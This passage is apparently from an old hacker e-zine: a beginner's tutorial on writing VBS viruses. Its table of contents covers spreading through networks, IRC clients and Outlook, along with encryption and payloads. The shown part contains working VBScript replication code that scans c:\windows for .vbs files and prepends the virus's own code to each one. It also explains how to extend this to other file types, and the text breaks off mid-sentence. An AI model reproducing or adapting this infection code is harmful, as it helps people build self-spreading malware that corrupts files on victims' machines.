_________ SWAT MAGAZINE ISSUE THIRTY SEVEN JANUARY __________
/ \___________________________________________/ \
/ The Beginners' Guide to VBS Viruses \
/ By Neon_Killer v.1.00 \
-----------------------------------------------------------------------
Contents:
1.a - Intro
1.b - Contact
2.a - What is VBS?
2.b - VBS basics
2.c - VBS virus basics
3.a - Infecting Networks
3.b - Infecting MIRC
3.c - Infecting PIRCH
3.d - Outlook [Basic]
3.e - Outlook [Alternative]
4.a - Encryption
5.a - Payloads
6.a - Morphodite
6.b - Final Words
1.a: Intro
Okay, here is where it all begins, this is the start of my tutorial
on VBS viruses. To tell you the truth, I probably know no more than you do
about the subject and therefor my information should not be taken as the gospel
truth. It's far from it. Infact it really is just the information that I as
a beginner/intermediate VBS virus writer could establish. My assembler skills
are terrible as anyone else will say on my part - but i've been doing Basic
and Visual Basic since time began so these viruses where an obvious step to
begin on, but I warn you, this is not the end of anything for me ( or you ).
This is just the beginning.
1.b: Contact
There aren't really that many places you can contact me. But you can
try these.
ICQ# 73643197
MAIL neon_killer@yahoo.com
MAIL neon_killer@hotmail.com
URL http://www14.brinkster.com/neonkill (give it a month or two to get
started)
2.a: What is VBS?
VBS or "Visual Basic Scripting" is ( as far as I can see ) just another
extension of HTML ( not unlike Java Script) . This does not however mean that if
a browser supports HTML it will also support VBS, I would say that the majority
of the browsers today and of the future will however support it in one form or
another. As VBScript becomes more and more popular ( as i perceive it will )
the chances are that browser developers will respond to the demands of web
designers and VBScript will become very widely supported. VBS is more useful
to web developers and VXers than HTML because gives easy access to ActiveX.
2.b: VBS basics
VBS is a Higher Level Language and has a not so distant relative named
Visual Basic, the basic language and sytax are very similar and so anyone who
is a previous user should find this a not too difficult tutorial to learn. For
anyone else I am just going to explain the very basics. To make a script, all
you have to do is open up a good old fashioned text-editor and write your code
into it in normal ascii format. Then you save the file as a ".vbs", then click
on it and the windows scripting host ( I think ?!?! on a win98+ computer should
run it. If not, don't worry - all you do is write a HTML document and put the
script in between
''
then you click it, your browser (ie. IE) should then run it for you.
2.c: VBS virus basics
In general, a virus needs a way to spread no matter what language, so
I'm going to outline the most simple way. All you have to do is search for
a target, then write on to the beginning, middle or end of the file.
This can be done in many ways, one such example is below.
Dim V, VFile, VCode, HomeCode, MyCode
For Each V in FSO.GetFolder("c:\windows").Files
If FSO.GetExtensionName(V.Name) = "vbs" then
Set VFile = FSO.OpenTextFile(V.Path, ForReading)
VCode = VFile.ReadAll
VFile.Close
Set HomeCode = FSO.OpenTextFile(Wscript.FullName, ForReading)
MyCode = HomeCode.ReadAll
HomeCode.Close
VCode = MyCode & VCode
Set VFile = FSO.OpenTextFile(V.Path,ForWriting,True)
VFile.Write VCode
VFile.close
End If
Next
End Sub
The above code gets all files with an extension of 'vbs' in the
c:\windows directory and appends itself at the beginning of them. I however
do not like using this way to spread my viruses, I feel that this could be
seen as destructive, and I don't like destructive viruses. It is also very
slow, infact VBS viruses are very slow anyway, this just makes them even
worse. The above code can also be used to infect other directorys and different
extensions.
To infect files with other extensions ( such as .ASP, .HTM, .HTML ) you
have toinclude
the '